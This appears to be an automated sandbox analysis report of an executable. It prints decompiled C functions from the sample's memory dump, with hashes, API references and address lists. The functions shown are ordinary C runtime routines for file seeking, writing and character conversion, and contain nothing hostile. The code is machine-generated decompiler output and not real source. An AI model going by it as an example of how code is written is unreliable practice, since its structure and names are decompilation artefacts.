String ID: @.B
API String ID: 467427115-470711618
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748, Relevance: 6.1, APIs: 4, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 8b3531c26803a1ee5de59a2a68d040ac0f465cd966dc2c29ac9bf7461512f0dd
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 8b3531c26803a1ee5de59a2a68d040ac0f465cd966dc2c29ac9bf7461512f0dd
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
